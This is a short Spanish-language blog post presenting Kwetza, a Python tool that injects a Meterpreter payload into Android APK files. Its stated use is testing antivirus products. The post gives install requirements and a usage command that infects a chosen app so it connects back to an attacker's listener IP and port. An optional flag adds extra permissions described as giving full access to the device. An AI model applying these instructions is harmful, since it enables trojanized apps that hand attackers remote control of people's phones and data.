De casualidad me he encontrado con una pequeña herramienta que parece bastante útil a la hora de poner a prueba un antivirus para Android, se trata de Kwetza. Con esta herramienta podemos inyectar un meterpreter en archivos APK, en otras palabras, podemos infectar archivos de aplicaciones o juegos Android.
Kwetza está escrito en Python y su uso es bastante sencillo como veremos a continuación. Además, también nos permite añadir nuevos permisos al APK modificado, con lo que se podría conseguir acceso total al dispositivo remoto.
Cómo instalar Kwetza.
La instalación del programa es muy sencilla, sólo necesitamos Python 2 instalado en nuestro sistema operativo y además requiere el módulo BeautifulSoup, el cual podemos instalar con Pip usando el comando pip install beautifulsoup4.
Otro requisito de Kwetza es que la aplicación Apktool sea accesible a través de la variable de entorno PATH. En la web de Apktool están las instrucciones de instalación: https://ibotpeaches.github.io/Apktool/install/.
Uso de Kwetza.
El uso de se Kwetza puede resumir en el siguiente comando de ejemplo:
python kwetza.py app.apk ip_listener port_listener yes/no
Las diferentes partes de este comando serían:
app.apk es el nombre de nuestro archivo de la aplicación que queremos infectar.ip_listener es la dirección ip donde escuchará nuestro meterpreter.ip_port es el puerto de escucha del meterpreter.yes/no es una última opción donde si elegimos yes se agregarán permisos extra para conseguir acceso total al dispositivo y si elegimos no se mantendrán los permisos del APK orginal.
Para más información os recomiendo pasaros por la página de GitHub del proyecto y también leer este artículo (en inglés) del desarrollador donde muestra en primer lugar todo el proceso de forma manual y finalmente nos muestra como automatizarlo usando Kwetza.
